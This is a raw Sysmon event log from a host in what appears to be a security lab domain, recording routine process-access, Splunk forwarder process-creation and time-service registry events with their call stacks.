12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6480-6064-5700-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-6480-6064-5600-00000000AE01}26123740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-6480-6064-5700-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.728{266CAFBE-6480-6064-5700-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-6480-6064-5600-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000002477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6480-6064-5600-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000002470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:04.721{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72625-0x86c1f3d2) 10341000x80000000000000002469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6480-6064-5600-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.705{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-6480-6064-5600-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-6480-6064-5600-00000000AE01}2612C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.674{266CAFBE-6480-6064-5500-00000000AE01}40124016C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.658{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 